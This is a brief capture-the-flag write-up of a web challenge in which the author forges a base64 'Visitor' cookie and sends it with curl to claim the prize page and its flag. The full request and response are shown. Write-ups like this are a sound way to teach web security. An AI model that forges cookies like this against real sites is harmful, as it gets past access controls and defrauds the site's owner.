Lottery was a 100 point web challenge in the ASIS Finals CTF. The description only said ‘Go here: http://asis-ctf.ir:12437’. That webpage was mostly non-functional, but said that the 1234567890th visitor would win a prize. Gee, I wonder what that is? My browser informed me that there were no cookies, but I wasn’t convinced.
I turned to curl. Luckily, curl informed me that there was indeed a cookie been set. A cookie named ‘Visitor’, no less:
$ curl -v http://asis-ctf.ir:12437/ --cookie "Visitor=MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg=="
* About to connect() to asis-ctf.ir port 12437 (#0)
* Trying 18.104.22.168...
* Connected to asis-ctf.ir (22.214.171.124) port 12437 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: asis-ctf.ir:12437
> Accept: */*
> Cookie: Visitor=MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg==
Google+"></a> </div></div><div class="data-wrapper"><p class="title">The 1234567890 th visitor, the prize awarded.</p><div class="content">Anyone who has visited our site is the 1234567890 th Special prizes are awarded. <br/>the flag is: ASIS_9f1af649f25108144fc38a01f8767c0c</div></div><div class="footer"><div class="p
The flag is ASIS_9f1af649f25108144fc38a01f8767c0c. Easy!